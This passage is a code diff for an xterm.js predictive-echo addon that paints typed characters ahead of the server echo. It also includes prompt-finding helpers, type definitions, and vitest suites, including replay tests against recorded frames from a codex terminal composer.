if (this._predictWhen && this._predictWhen(t) === false) return false;
|
||||
|
||||
const cps = Array.from(ch);
|
||||
if (cps.length !== 1) return false;
|
||||
const cp = cps[0].codePointAt(0)!;
|
||||
if (cp < 0x20 || cp === 0x7f) return false;
|
||||
const w = charCellWidth(t, cps[0]);
|
||||
if (w !== 1 && w !== 2) return false;
|
||||
if (w === 2 && !this._hasGetCell()) return false; // ASCII fallback misaligns on wide cols
|
||||
if (this._outstanding.length >= this._options.maxPending) return false;
|
||||
|
||||
if (this._outstanding.length === 0) {
|
||||
this._anchor = { row: buf.cursorY, col: buf.cursorX };
|
||||
this._cursorOffRowSince = null;
|
||||
}
|
||||
const anchor = this._anchor!;
|
||||
const last = this._outstanding[this._outstanding.length - 1];
|
||||
const offset = last ? last.offsetCells + last.width : 0;
|
||||
const col = anchor.col + offset;
|
||||
if (col + w > t.cols - this._options.edgeMarginCells) return false;
|
||||
|
||||
const rec: PredictionRecord = {
|
||||
seq: this._seq++,
|
||||
char: cps[0],
|
||||
width: w,
|
||||
offsetCells: offset,
|
||||
snapshot: this._readCell(anchor.row, col),
|
||||
sentAt: performance.now(),
|
||||
mismatches: 0,
|
||||
};
|
||||
this._outstanding.push(rec);
|
||||
addPredictionSpan(this._container, this._spans, {
|
||||
seq: rec.seq,
|
||||
row: anchor.row,
|
||||
col,
|
||||
char: rec.char,
|
||||
width: w,
|
||||
dims,
|
||||
font: this._font,
|
||||
underline: this._options.underlinePredictions,
|
||||
});
|
||||
this._armTtl();
|
||||
return true;
|
||||
} catch {
|
||||
return false;
|
||||
}
|
||||
}
|
||||
|
||||
/**
|
||||
* Pop the newest outstanding prediction (visual only). Returns false when
|
||||
* none are outstanding. The consumer forwards \x7f UNCONDITIONALLY either
|
||||
* way; deleting already-echoed text renders at RTT.
|
||||
*/
|
||||
predictBackspace(): boolean {
|
||||
try {
|
||||
const rec = this._outstanding.pop();
|
||||
if (!rec) {
|
||||
// \x7f goes to the wire and will delete ECHOED text: the cursor is
|
||||
// about to move in a way we cannot see yet
|
||||
this._anchorHold = true;
|
||||
return false;
|
||||
}
|
||||
removePredictionSpan(this._spans, rec.seq);
|
||||
if (this._outstanding.length === 0) this._resetRun();
|
||||
return true;
|
||||
} catch {
|
||||
return false;
|
||||
}
|
||||
}
|
||||
|
||||
/** Drop every outstanding prediction and its spans. Also arms the anchor
|
||||
* hold: consumers clear on inputs (Enter, Esc, arrows, pastes) whose
|
||||
* cursor effect is unknown until the next parsed write. */
|
||||
clearPredictions(): void {
|
||||
try {
|
||||
this._anchorHold = true;
|
||||
this._droppedTotal += this._outstanding.length;
|
||||
this._outstanding = [];
|
||||
clearAllSpans(this._spans);
|
||||
this._resetRun();
|
||||
} catch {
|
||||
/* ignore */
|
||||
}
|
||||
}
|
||||
|
||||
/** Manual reconcile pass, for consumers without onWriteParsed. By contract
|
||||
* it is called after writes parsed, so it also releases the anchor hold. */
|
||||
reconcile(): void {
|
||||
this._anchorHold = false;
|
||||
this._safeReconcile();
|
||||
}
|
||||
|
||||
/** Swap the prediction gate at runtime (mirrors the buffer addon's setPrompt). */
|
||||
setPredictWhen(fn: ((terminal: XtermTerminal) => boolean) | null): void {
|
||||
this._predictWhen = fn;
|
||||
}
|
||||
|
||||
/** Re-read font/theme (call after skin or font-size changes). */
|
||||
refreshFont(): void {
|
||||
this._readFontStyle();
|
||||
}
|
||||
|
||||
get hasPredictions(): boolean {
|
||||
return this._outstanding.length > 0;
|
||||
}
|
||||
|
||||
get state(): PredictionState {
|
||||
return {
|
||||
outstanding: this._outstanding.length,
|
||||
confirmedTotal: this._confirmedTotal,
|
||||
droppedTotal: this._droppedTotal,
|
||||
anchor: this._anchor ? { ...this._anchor } : null,
|
||||
};
|
||||
}
|
||||
|
||||
// ─── Reconciliation ───────────────────────────────────────────────
|
||||
|
||||
private _safeReconcile(): void {
|
||||
try {
|
||||
this._reconcile();
|
||||
} catch {
|
||||
/* predictions may degrade, never break input */
|
||||
}
|
||||
}
|
||||
|
||||
private _reconcile(): void {
|
||||
const t = this._terminal;
|
||||
if (!t) return;
|
||||
if (this._outstanding.length === 0) return; // streaming cost: one boolean
|
||||
const buf = t.buffer.active;
|
||||
if (buf.viewportY !== buf.baseY) {
|
||||
this.clearPredictions(); // user scrolled up
|
||||
return;
|
||||
}
|
||||
if (typeof buf.cursorX !== 'number' || typeof buf.cursorY !== 'number') return; // TTL will clean
|
||||
const anchor = this._anchor!;
|
||||
const now = performance.now();
|
||||
|
||||
// Off-row grace: transient cursor excursions (repaints park the cursor
|
||||
// elsewhere mid-frame) are tolerated; a sustained move means the composer
|
||||
// relocated or the user navigated, so predictions are stale.
|
||||
if (buf.cursorY !== anchor.row) {
|
||||
this._cursorOffRowSince ??= now;
|
||||
if (now - this._cursorOffRowSince > this._options.cursorGraceMs) {
|
||||
this.clearPredictions();
|
||||
return;
|
||||
}
|
||||
} else {
|
||||
this._cursorOffRowSince = null;
|
||||
}
|
||||
|
||||
// Confirm loop: PREFIX-ONLY, and only with the cursor advanced past the
|
||||
// record. Cell match alone is not enough: the predicted char may equal
|
||||
// pre-existing content (placeholder glyphs), and an identical in-place
|
||||
// tmux repaint must be a no-op (cells match snapshots, cursor unmoved).
|
||||
while (this._outstanding.length > 0) {
|
||||
const rec = this._outstanding[0];
|
||||
const cell = this._readCell(anchor.row, anchor.col + rec.offsetCells);
|
||||
if (cell === rec.char && buf.cursorY === anchor.row && buf.cursorX >= anchor.col + rec.offsetCells + rec.width) {
|
||||
this._outstanding.shift();
|
||||
removePredictionSpan(this._spans, rec.seq);
|
||||
this._confirmedTotal++;
|
||||
} else {
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
// Mismatch scan (two-pass rule): a half-parsed row on pass N is fully
|
||||
// redrawn a few ms later, so only content foreign on TWO consecutive
|
||||
// passes cascades. Blank cells are NEUTRAL, not foreign: codex clears its
|
||||
// placeholder on the first echo, and the blanks left under later
|
||||
// predictions are what "not yet echoed" looks like, not evidence of a
|
||||
// redraw (measured 2026-08-09; without this, fast typing over the
|
||||
// placeholder cascades exactly when RTT is high). TTL still bounds them.
|
||||
let dropFrom = -1;
|
||||
for (let i = 0; i < this._outstanding.length; i++) {
|
||||
const rec = this._outstanding[i];
|
||||
const cell = this._readCell(anchor.row, anchor.col + rec.offsetCells);
|
||||
if (cell !== rec.snapshot && cell !== rec.char && cell !== ' ') {
|
||||
rec.mismatches++;
|
||||
if (rec.mismatches >= 2) {
|
||||
dropFrom = i;
|
||||
break;
|
||||
}
|
||||
} else {
|
||||
rec.mismatches = 0;
|
||||
}
|
||||
}
|
||||
if (dropFrom !== -1) this._dropFrom(dropFrom);
|
||||
|
||||
// TTL: the first stale record drops itself and everything after it.
|
||||
for (let i = 0; i < this._outstanding.length; i++) {
|
||||
if (now - this._outstanding[i].sentAt > this._options.ttlMs) {
|
||||
this._dropFrom(i);
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
if (this._outstanding.length === 0) {
|
||||
this._resetRun();
|
||||
} else {
|
||||
this._armTtl();
|
||||
}
|
||||
}
|
||||
|
||||
private _dropFrom(index: number): void {
|
||||
const dropped = this._outstanding.splice(index);
|
||||
for (const rec of dropped) removePredictionSpan(this._spans, rec.seq);
|
||||
this._droppedTotal += dropped.length;
|
||||
}
|
||||
|
||||
private _resetRun(): void {
|
||||
this._anchor = null;
|
||||
this._cursorOffRowSince = null;
|
||||
if (this._ttlTimer !== null) {
|
||||
clearTimeout(this._ttlTimer);
|
||||
this._ttlTimer = null;
|
||||
}
|
||||
}
|
||||
|
||||
private _armTtl(): void {
|
||||
if (this._ttlTimer !== null) return;
|
||||
const oldest = this._outstanding[0];
|
||||
if (!oldest) return;
|
||||
const delay = Math.max(0, oldest.sentAt + this._options.ttlMs - performance.now()) + 1;
|
||||
this._ttlTimer = setTimeout(() => {
|
||||
this._ttlTimer = null;
|
||||
this._safeReconcile();
|
||||
this._armTtl();
|
||||
}, delay);
|
||||
}
|
||||
|
||||
// ─── Cell access ──────────────────────────────────────────────────
|
||||
|
||||
private _hasGetCell(): boolean {
|
||||
const buf = this._terminal?.buffer.active;
|
||||
if (!buf) return false;
|
||||
const line = buf.getLine(buf.baseY + (buf.cursorY ?? 0));
|
||||
return typeof line?.getCell === 'function';
|
||||
}
|
||||
|
||||
/** Read one cell's chars at (viewport-relative row, col); '' -> ' '. */
|
||||
private _readCell(row: number, col: number): string {
|
||||
const buf = this._terminal!.buffer.active;
|
||||
const line = buf.getLine(buf.baseY + row);
|
||||
if (!line) return ' ';
|
||||
if (typeof line.getCell === 'function') {
|
||||
const chars = line.getCell(col)?.getChars() ?? '';
|
||||
return chars === '' ? ' ' : chars;
|
||||
}
|
||||
// ASCII fallback: code-unit index, misaligns after wide columns, which is
|
||||
// why width-2 predictions are suppressed without getCell.
|
||||
const text = line.translateToString(true);
|
||||
return text[col] ?? ' ';
|
||||
}
|
||||
|
||||
// ─── Font ─────────────────────────────────────────────────────────
|
||||
|
||||
/** Same recipe as the buffer addon's _cacheFont (kept private on purpose:
|
||||
* zerolag-input-addon.ts must stay untouched by this feature). */
|
||||
private _readFontStyle(): void {
|
||||
const t = this._terminal;
|
||||
if (!t) return;
|
||||
this._font.fontFamily = t.options.fontFamily || 'monospace';
|
||||
this._font.fontSize = (t.options.fontSize || 14) + 'px';
|
||||
this._font.fontWeight = String(t.options.fontWeight || 'normal');
|
||||
this._font.backgroundColor = this._options.backgroundColor ?? t.options.theme?.background ?? DEFAULT_BG;
|
||||
this._font.color = this._options.foregroundColor ?? t.options.theme?.foreground ?? DEFAULT_FG;
|
||||
this._font.letterSpacing = '';
|
||||
const rows = t.element?.querySelector('.xterm-rows');
|
||||
if (rows) {
|
||||
const cs = getComputedStyle(rows);
|
||||
this._font.letterSpacing = cs.letterSpacing;
|
||||
if (!this._options.foregroundColor && cs.color) this._font.color = cs.color;
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -6,55 +6,50 @@ import type { XtermTerminal, PromptFinder, PromptPosition } from './types.js';
|
||||
*
|
||||
* @returns The prompt position (viewport-relative), or `null` if not found.
|
||||
*/
|
||||
export function findPrompt(
|
||||
terminal: XtermTerminal,
|
||||
finder: PromptFinder,
|
||||
): PromptPosition | null {
|
||||
try {
|
||||
const buffer = terminal.buffer.active;
|
||||
const viewportTop = buffer.viewportY;
|
||||
export function findPrompt(terminal: XtermTerminal, finder: PromptFinder): PromptPosition | null {
|
||||
try {
|
||||
const buffer = terminal.buffer.active;
|
||||
const viewportTop = buffer.viewportY;
|
||||
|
||||
switch (finder.type) {
|
||||
case 'character': {
|
||||
for (let row = terminal.rows - 1; row >= 0; row--) {
|
||||
const line = buffer.getLine(viewportTop + row);
|
||||
if (!line) continue;
|
||||
const text = line.translateToString(true);
|
||||
const idx = text.lastIndexOf(finder.char);
|
||||
if (idx >= 0) return { row, col: idx };
|
||||
}
|
||||
return null;
|
||||
}
|
||||
|
||||
case 'regex': {
|
||||
// Create a fresh non-global regex to avoid lastIndex mutation
|
||||
// and ensure .match() returns a single result with .index
|
||||
const pattern = finder.pattern;
|
||||
const safePattern = pattern.global
|
||||
? new RegExp(pattern.source, pattern.flags.replace('g', ''))
|
||||
: pattern;
|
||||
for (let row = terminal.rows - 1; row >= 0; row--) {
|
||||
const line = buffer.getLine(viewportTop + row);
|
||||
if (!line) continue;
|
||||
const text = line.translateToString(true);
|
||||
const match = text.match(safePattern);
|
||||
if (match) {
|
||||
const col = match.index ?? 0;
|
||||
return { row, col };
|
||||
}
|
||||
}
|
||||
return null;
|
||||
}
|
||||
|
||||
case 'custom':
|
||||
return finder.find(terminal);
|
||||
|
||||
default:
|
||||
return null;
|
||||
switch (finder.type) {
|
||||
case 'character': {
|
||||
for (let row = terminal.rows - 1; row >= 0; row--) {
|
||||
const line = buffer.getLine(viewportTop + row);
|
||||
if (!line) continue;
|
||||
const text = line.translateToString(true);
|
||||
const idx = text.lastIndexOf(finder.char);
|
||||
if (idx >= 0) return { row, col: idx };
|
||||
}
|
||||
} catch {
|
||||
return null;
|
||||
}
|
||||
|
||||
case 'regex': {
|
||||
// Create a fresh non-global regex to avoid lastIndex mutation
|
||||
// and ensure .match() returns a single result with .index
|
||||
const pattern = finder.pattern;
|
||||
const safePattern = pattern.global ? new RegExp(pattern.source, pattern.flags.replace('g', '')) : pattern;
|
||||
for (let row = terminal.rows - 1; row >= 0; row--) {
|
||||
const line = buffer.getLine(viewportTop + row);
|
||||
if (!line) continue;
|
||||
const text = line.translateToString(true);
|
||||
const match = text.match(safePattern);
|
||||
if (match) {
|
||||
const col = match.index ?? 0;
|
||||
return { row, col };
|
||||
}
|
||||
}
|
||||
return null;
|
||||
}
|
||||
|
||||
case 'custom':
|
||||
return finder.find(terminal);
|
||||
|
||||
default:
|
||||
return null;
|
||||
}
|
||||
} catch {
|
||||
return null;
|
||||
}
|
||||
}
|
||||
|
||||
/**
|
||||
@@ -65,19 +60,15 @@ export function findPrompt(
|
||||
* @param offset - Characters to skip after the prompt marker (e.g., 2 for "> ")
|
||||
* @returns The text after the prompt, trimmed. Empty string if nothing found.
|
||||
*/
|
||||
export function readTextAfterPrompt(
|
||||
terminal: XtermTerminal,
|
||||
prompt: PromptPosition,
|
||||
offset: number,
|
||||
): string {
|
||||
try {
|
||||
const buffer = terminal.buffer.active;
|
||||
const absRow = buffer.viewportY + prompt.row;
|
||||
const line = buffer.getLine(absRow);
|
||||
if (!line) return '';
|
||||
const lineText = line.translateToString(true);
|
||||
return lineText.slice(prompt.col + offset).trimEnd();
|
||||
} catch {
|
||||
return '';
|
||||
}
|
||||
export function readTextAfterPrompt(terminal: XtermTerminal, prompt: PromptPosition, offset: number): string {
|
||||
try {
|
||||
const buffer = terminal.buffer.active;
|
||||
const absRow = buffer.viewportY + prompt.row;
|
||||
const line = buffer.getLine(absRow);
|
||||
if (!line) return '';
|
||||
const lineText = line.translateToString(true);
|
||||
return lineText.slice(prompt.col + offset).trimEnd();
|
||||
} catch {
|
||||
return '';
|
||||
}
|
||||
}
|
||||
|
||||
@@ -22,9 +22,15 @@ export interface XtermTerminal {
|
||||
readonly active: {
|
||||
readonly viewportY: number;
|
||||
readonly baseY: number;
|
||||
/** Cursor column (0-based). Used by PredictiveEchoAddon. */
|
||||
readonly cursorX?: number;
|
||||
/** Cursor row, relative to baseY (0-based). Used by PredictiveEchoAddon. */
|
||||
readonly cursorY?: number;
|
||||
getLine(y: number):
|
||||
| {
|
||||
translateToString(trimRight?: boolean): string;
|
||||
/** Cell access (xterm public API). Optional: mocks/exotic hosts may omit it. */
|
||||
getCell?(x: number): { getChars(): string; getWidth(): number } | undefined;
|
||||
}
|
||||
| undefined;
|
||||
};
|
||||
@@ -34,6 +40,10 @@ export interface XtermTerminal {
|
||||
getStringCellWidth(str: string): number;
|
||||
activeVersion?: string;
|
||||
};
|
||||
/** Fires after the parser finishes a write chunk. Used by PredictiveEchoAddon. */
|
||||
onWriteParsed?(cb: () => void): { dispose(): void };
|
||||
/** Fires on terminal resize. Used by PredictiveEchoAddon. */
|
||||
onResize?(cb: (size: { cols: number; rows: number }) => void): { dispose(): void };
|
||||
}
|
||||
|
||||
/**
|
||||
|
||||
@@ -6,122 +6,125 @@ import type { XtermTerminal } from '../src/types.js';
|
||||
let cleanups: (() => void)[] = [];
|
||||
|
||||
afterEach(() => {
|
||||
for (const fn of cleanups) fn();
|
||||
cleanups = [];
|
||||
for (const fn of cleanups) fn();
|
||||
cleanups = [];
|
||||
});
|
||||
|
||||
describe('getCellDimensions', () => {
|
||||
describe('v5 private API (mock _core._renderService)', () => {
|
||||
it('returns cell width and height from css.cell', () => {
|
||||
const mock = createMockTerminal({ cellWidth: 8.4, cellHeight: 19 });
|
||||
cleanups.push(mock.cleanup);
|
||||
const dims = getCellDimensions(mock.terminal as unknown as XtermTerminal);
|
||||
expect(dims).not.toBeNull();
|
||||
expect(dims!.width).toBe(8.4);
|
||||
expect(dims!.height).toBe(19);
|
||||
});
|
||||
|
||||
it('returns charTop from device.char.top divided by DPR', () => {
|
||||
const mock = createMockTerminal({
|
||||
cellWidth: 8, cellHeight: 19,
|
||||
deviceCharTop: 2,
|
||||
});
|
||||
cleanups.push(mock.cleanup);
|
||||
const dims = getCellDimensions(mock.terminal as unknown as XtermTerminal);
|
||||
expect(dims).not.toBeNull();
|
||||
// DPR=1 in jsdom, so charTop = 2 / 1 = 2
|
||||
expect(dims!.charTop).toBe(2);
|
||||
});
|
||||
|
||||
it('returns charHeight from device.char.height divided by DPR', () => {
|
||||
const mock = createMockTerminal({
|
||||
cellWidth: 8, cellHeight: 19,
|
||||
deviceCharHeight: 16,
|
||||
});
|
||||
cleanups.push(mock.cleanup);
|
||||
const dims = getCellDimensions(mock.terminal as unknown as XtermTerminal);
|
||||
expect(dims).not.toBeNull();
|
||||
// DPR=1, so charHeight = 16 / 1 = 16
|
||||
expect(dims!.charHeight).toBe(16);
|
||||
});
|
||||
|
||||
it('defaults charTop to 0 when device.char not present', () => {
|
||||
// Default mock has deviceCharTop=0
|
||||
const mock = createMockTerminal({ cellWidth: 8, cellHeight: 19 });
|
||||
cleanups.push(mock.cleanup);
|
||||
const dims = getCellDimensions(mock.terminal as unknown as XtermTerminal);
|
||||
expect(dims!.charTop).toBe(0);
|
||||
});
|
||||
|
||||
it('defaults charHeight to cellH when device.char.height not set', () => {
|
||||
// Default mock has deviceCharHeight=cellH
|
||||
const mock = createMockTerminal({ cellWidth: 8, cellHeight: 19 });
|
||||
cleanups.push(mock.cleanup);
|
||||
const dims = getCellDimensions(mock.terminal as unknown as XtermTerminal);
|
||||
expect(dims!.charHeight).toBe(19);
|
||||
});
|
||||
describe('v5 private API (mock _core._renderService)', () => {
|
||||
it('returns cell width and height from css.cell', () => {
|
||||
const mock = createMockTerminal({ cellWidth: 8.4, cellHeight: 19 });
|
||||
cleanups.push(mock.cleanup);
|
||||
const dims = getCellDimensions(mock.terminal as unknown as XtermTerminal);
|
||||
expect(dims).not.toBeNull();
|
||||
expect(dims!.width).toBe(8.4);
|
||||
expect(dims!.height).toBe(19);
|
||||
});
|
||||
|
||||
describe('DPR simulation', () => {
|
||||
const originalDPR = globalThis.devicePixelRatio;
|
||||
|
||||
beforeEach(() => {
|
||||
// Set DPR=2 to test division
|
||||
Object.defineProperty(globalThis, 'devicePixelRatio', {
|
||||
value: 2,
|
||||
writable: true,
|
||||
configurable: true,
|
||||
});
|
||||
});
|
||||
|
||||
afterEach(() => {
|
||||
Object.defineProperty(globalThis, 'devicePixelRatio', {
|
||||
value: originalDPR,
|
||||
writable: true,
|
||||
configurable: true,
|
||||
});
|
||||
});
|
||||
|
||||
it('divides device.char.top by DPR', () => {
|
||||
const mock = createMockTerminal({
|
||||
cellWidth: 16, cellHeight: 38,
|
||||
deviceCharTop: 4,
|
||||
deviceCharHeight: 32,
|
||||
});
|
||||
cleanups.push(mock.cleanup);
|
||||
const dims = getCellDimensions(mock.terminal as unknown as XtermTerminal);
|
||||
expect(dims).not.toBeNull();
|
||||
// charTop = 4 / 2 = 2
|
||||
expect(dims!.charTop).toBe(2);
|
||||
// charHeight = 32 / 2 = 16
|
||||
expect(dims!.charHeight).toBe(16);
|
||||
});
|
||||
it('returns charTop from device.char.top divided by DPR', () => {
|
||||
const mock = createMockTerminal({
|
||||
cellWidth: 8,
|
||||
cellHeight: 19,
|
||||
deviceCharTop: 2,
|
||||
});
|
||||
cleanups.push(mock.cleanup);
|
||||
const dims = getCellDimensions(mock.terminal as unknown as XtermTerminal);
|
||||
expect(dims).not.toBeNull();
|
||||
// DPR=1 in jsdom, so charTop = 2 / 1 = 2
|
||||
expect(dims!.charTop).toBe(2);
|
||||
});
|
||||
|
||||
describe('null cases', () => {
|
||||
it('returns null for terminal without _core', () => {
|
||||
const terminal = {
|
||||
element: document.createElement('div'),
|
||||
cols: 80,
|
||||
rows: 24,
|
||||
options: {},
|
||||
buffer: { active: { viewportY: 0, baseY: 0, getLine: () => undefined } },
|
||||
} as unknown as XtermTerminal;
|
||||
const dims = getCellDimensions(terminal);
|
||||
expect(dims).toBeNull();
|
||||
});
|
||||
|
||||
it('returns null for terminal with no dimensions', () => {
|
||||
const terminal = {
|
||||
element: document.createElement('div'),
|
||||
cols: 80,
|
||||
rows: 24,
|
||||
options: {},
|
||||
buffer: { active: { viewportY: 0, baseY: 0, getLine: () => undefined } },
|
||||
_core: { _renderService: {} },
|
||||
} as unknown as XtermTerminal;
|
||||
const dims = getCellDimensions(terminal);
|
||||
expect(dims).toBeNull();
|
||||
});
|
||||
it('returns charHeight from device.char.height divided by DPR', () => {
|
||||
const mock = createMockTerminal({
|
||||
cellWidth: 8,
|
||||
cellHeight: 19,
|
||||
deviceCharHeight: 16,
|
||||
});
|
||||
cleanups.push(mock.cleanup);
|
||||
const dims = getCellDimensions(mock.terminal as unknown as XtermTerminal);
|
||||
expect(dims).not.toBeNull();
|
||||
// DPR=1, so charHeight = 16 / 1 = 16
|
||||
expect(dims!.charHeight).toBe(16);
|
||||
});
|
||||
|
||||
it('defaults charTop to 0 when device.char not present', () => {
|
||||
// Default mock has deviceCharTop=0
|
||||
const mock = createMockTerminal({ cellWidth: 8, cellHeight: 19 });
|
||||
cleanups.push(mock.cleanup);
|
||||
const dims = getCellDimensions(mock.terminal as unknown as XtermTerminal);
|
||||
expect(dims!.charTop).toBe(0);
|
||||
});
|
||||
|
||||
it('defaults charHeight to cellH when device.char.height not set', () => {
|
||||
// Default mock has deviceCharHeight=cellH
|
||||
const mock = createMockTerminal({ cellWidth: 8, cellHeight: 19 });
|
||||
cleanups.push(mock.cleanup);
|
||||
const dims = getCellDimensions(mock.terminal as unknown as XtermTerminal);
|
||||
expect(dims!.charHeight).toBe(19);
|
||||
});
|
||||
});
|
||||
|
||||
describe('DPR simulation', () => {
|
||||
const originalDPR = globalThis.devicePixelRatio;
|
||||
|
||||
beforeEach(() => {
|
||||
// Set DPR=2 to test division
|
||||
Object.defineProperty(globalThis, 'devicePixelRatio', {
|
||||
value: 2,
|
||||
writable: true,
|
||||
configurable: true,
|
||||
});
|
||||
});
|
||||
|
||||
afterEach(() => {
|
||||
Object.defineProperty(globalThis, 'devicePixelRatio', {
|
||||
value: originalDPR,
|
||||
writable: true,
|
||||
configurable: true,
|
||||
});
|
||||
});
|
||||
|
||||
it('divides device.char.top by DPR', () => {
|
||||
const mock = createMockTerminal({
|
||||
cellWidth: 16,
|
||||
cellHeight: 38,
|
||||
deviceCharTop: 4,
|
||||
deviceCharHeight: 32,
|
||||
});
|
||||
cleanups.push(mock.cleanup);
|
||||
const dims = getCellDimensions(mock.terminal as unknown as XtermTerminal);
|
||||
expect(dims).not.toBeNull();
|
||||
// charTop = 4 / 2 = 2
|
||||
expect(dims!.charTop).toBe(2);
|
||||
// charHeight = 32 / 2 = 16
|
||||
expect(dims!.charHeight).toBe(16);
|
||||
});
|
||||
});
|
||||
|
||||
describe('null cases', () => {
|
||||
it('returns null for terminal without _core', () => {
|
||||
const terminal = {
|
||||
element: document.createElement('div'),
|
||||
cols: 80,
|
||||
rows: 24,
|
||||
options: {},
|
||||
buffer: { active: { viewportY: 0, baseY: 0, getLine: () => undefined } },
|
||||
} as unknown as XtermTerminal;
|
||||
const dims = getCellDimensions(terminal);
|
||||
expect(dims).toBeNull();
|
||||
});
|
||||
|
||||
it('returns null for terminal with no dimensions', () => {
|
||||
const terminal = {
|
||||
element: document.createElement('div'),
|
||||
cols: 80,
|
||||
rows: 24,
|
||||
options: {},
|
||||
buffer: { active: { viewportY: 0, baseY: 0, getLine: () => undefined } },
|
||||
_core: { _renderService: {} },
|
||||
} as unknown as XtermTerminal;
|
||||
const dims = getCellDimensions(terminal);
|
||||
expect(dims).toBeNull();
|
||||
});
|
||||
});
|
||||
});
|
||||
|
||||
@@ -0,0 +1,188 @@
|
||||
/**
|
||||
* @vitest-environment jsdom
|
||||
*
|
||||
* Layer 2 (the load-bearing suite): the REAL algorithm against the REAL xterm
|
||||
* parser, fed by fixtures recorded from real codex 0.147 through the
|
||||
* production pipeline (tmux + the codex full strip). See
|
||||
* scripts/dev/record-codex-frames.mjs in the consuming repo.
|
||||
*
|
||||
* Every replay ends with the convergence invariant: predictions never outlive
|
||||
* their run (outstanding 0, span container empty).
|
||||
*/
|
||||
import { describe, expect, it } from 'vitest';
|
||||
import { PredictiveEchoAddon } from '../src/predictive-echo-addon.js';
|
||||
import {
|
||||
CELL_H,
|
||||
CELL_W,
|
||||
classifyPredictInput,
|
||||
codexComposerGate,
|
||||
createReplayTerminal,
|
||||
loadFixture,
|
||||
type ReplayTerminal,
|
||||
} from './replay-helpers.js';
|
||||
|
||||
async function flushMicrotasks() {
|
||||
await Promise.resolve();
|
||||
await Promise.resolve();
|
||||
}
|
||||
|
||||
function sleep(ms: number) {
|
||||
return new Promise((r) => setTimeout(r, ms));
|
||||
}
|
||||
|
||||
interface KeyEvent {
|
||||
key: string;
|
||||
kind: ReturnType<typeof classifyPredictInput>;
|
||||
painted: boolean;
|
||||
spansAfter: number;
|
||||
}
|
||||
|
||||
function assertSpansInGrid(rt: ReplayTerminal) {
|
||||
for (const s of rt.spans()) {
|
||||
const left = parseFloat(s.style.left);
|
||||
const width = parseFloat(s.style.width);
|
||||
const top = parseFloat(s.style.top);
|
||||
expect(left + width).toBeLessThanOrEqual(rt.hybrid.cols * CELL_W);
|
||||
expect(top).toBeLessThanOrEqual((rt.hybrid.rows - 1) * CELL_H);
|
||||
expect(left).toBeGreaterThanOrEqual(0);
|
||||
expect(top).toBeGreaterThanOrEqual(0);
|
||||
}
|
||||
}
|
||||
|
||||
async function replay(name: string) {
|
||||
const { meta, lines } = loadFixture(name);
|
||||
const rt = createReplayTerminal(meta.cols, meta.rows);
|
||||
const addon = new PredictiveEchoAddon({ predictWhen: codexComposerGate });
|
||||
addon.activate(rt.hybrid);
|
||||
|
||||
const events: KeyEvent[] = [];
|
||||
for (const line of lines) {
|
||||
if (line.keyAt) {
|
||||
const kind = classifyPredictInput(line.data);
|
||||
let painted = false;
|
||||
if (kind === 'char') painted = addon.predictChar(line.data);
|
||||
else if (kind === 'backspace') addon.predictBackspace();
|
||||
else addon.clearPredictions(); // 'clear' AND 'text', like the terminal-ui hook
|
||||
// Span/record parity and grid bounds hold at every step
|
||||
expect(rt.spanCount()).toBe(addon.state.outstanding);
|
||||
assertSpansInGrid(rt);
|
||||
events.push({ key: line.data, kind, painted, spansAfter: rt.spanCount() });
|
||||
} else {
|
||||
await rt.write(line.data);
|
||||
await flushMicrotasks();
|
||||
}
|
||||
}
|
||||
return { rt, addon, events, meta };
|
||||
}
|
||||
|
||||
/** Convergence invariant: after the last chunk + reconcile (+ TTL if needed),
|
||||
* nothing outlives the run. */
|
||||
async function converge(rt: ReplayTerminal, addon: PredictiveEchoAddon) {
|
||||
addon.reconcile();
|
||||
if (addon.state.outstanding > 0) {
|
||||
await sleep(1100); // ttlMs default
|
||||
addon.reconcile();
|
||||
}
|
||||
expect(addon.state.outstanding).toBe(0);
|
||||
expect(rt.spanCount()).toBe(0);
|
||||
}
|
||||
|
||||
describe('codex replay', () => {
|
||||
it('type-hello: all 5 predictions confirm, zero drops, composer converges', async () => {
|
||||
const { rt, addon, events } = await replay('type-hello');
|
||||
const chars = events.filter((e) => e.kind === 'char');
|
||||
expect(chars).toHaveLength(5);
|
||||
expect(chars.every((e) => e.painted)).toBe(true);
|
||||
await converge(rt, addon);
|
||||
expect(addon.state.confirmedTotal).toBe(5);
|
||||
expect(addon.state.droppedTotal).toBe(0);
|
||||
expect(rt.cursorRowText()).toBe('› hello');
|
||||
addon.dispose();
|
||||
rt.cleanup();
|
||||
}, 15000);
|
||||
|
||||
it('slash-picker: "/" and filter chars confirm; no ghosts while picker rows redraw', async () => {
|
||||
const { rt, addon, events } = await replay('slash-picker');
|
||||
const chars = events.filter((e) => e.kind === 'char');
|
||||
expect(chars.map((e) => e.key)).toEqual(['/', 'm', 'o']);
|
||||
expect(chars.every((e) => e.painted)).toBe(true);
|
||||
await converge(rt, addon);
|
||||
expect(addon.state.confirmedTotal).toBe(3);
|
||||
expect(addon.state.droppedTotal).toBe(0);
|
||||
addon.dispose();
|
||||
rt.cleanup();
|
||||
}, 15000);
|
||||
|
||||
it('wrap: predictions stay inside the grid, continuation rows fall back to real echo, buffer converges', async () => {
|
||||
const { rt, addon, events } = await replay('wrap');
|
||||
// The gate goes false once the cursor is on a wrapped continuation row
|
||||
// (2-space indent, no "› "): a tail of keystrokes must be suppressed.
|
||||
const chars = events.filter((e) => e.kind === 'char');
|
||||
expect(chars.some((e) => !e.painted)).toBe(true);
|
||||
expect(chars.some((e) => e.painted)).toBe(true);
|
||||
await converge(rt, addon);
|
||||
// The composer content is exactly what was typed (word-wrapped)
|
||||
const b = rt.term.buffer.active;
|
||||
const cursorRow = b.cursorY;
|
||||
expect(rt.rowText(cursorRow).trim()).toBe('this line twice over');
|
||||
expect(rt.rowText(cursorRow - 1)).toMatch(/^› the quick brown fox/);
|
||||
addon.dispose();
|
||||
rt.cleanup();
|
||||
}, 15000);
|
||||
|
||||
it('streaming-burst: typed predictions confirm; the re-rendered composer keeps its signature', async () => {
|
||||
const { rt, addon, events } = await replay('streaming-burst');
|
||||
const chars = events.filter((e) => e.kind === 'char');
|
||||
expect(chars).toHaveLength(5); // "hello" (the \r is kind 'clear')
|
||||
await converge(rt, addon);
|
||||
expect(addon.state.confirmedTotal).toBe(5);
|
||||
expect(addon.state.droppedTotal).toBe(0);
|
||||
// After the 401 burst codex re-renders a fresh composer at the cursor
|
||||
expect(rt.cursorRowText()).toMatch(/^› /);
|
||||
addon.dispose();
|
||||
rt.cleanup();
|
||||
}, 15000);
|
||||
|
||||
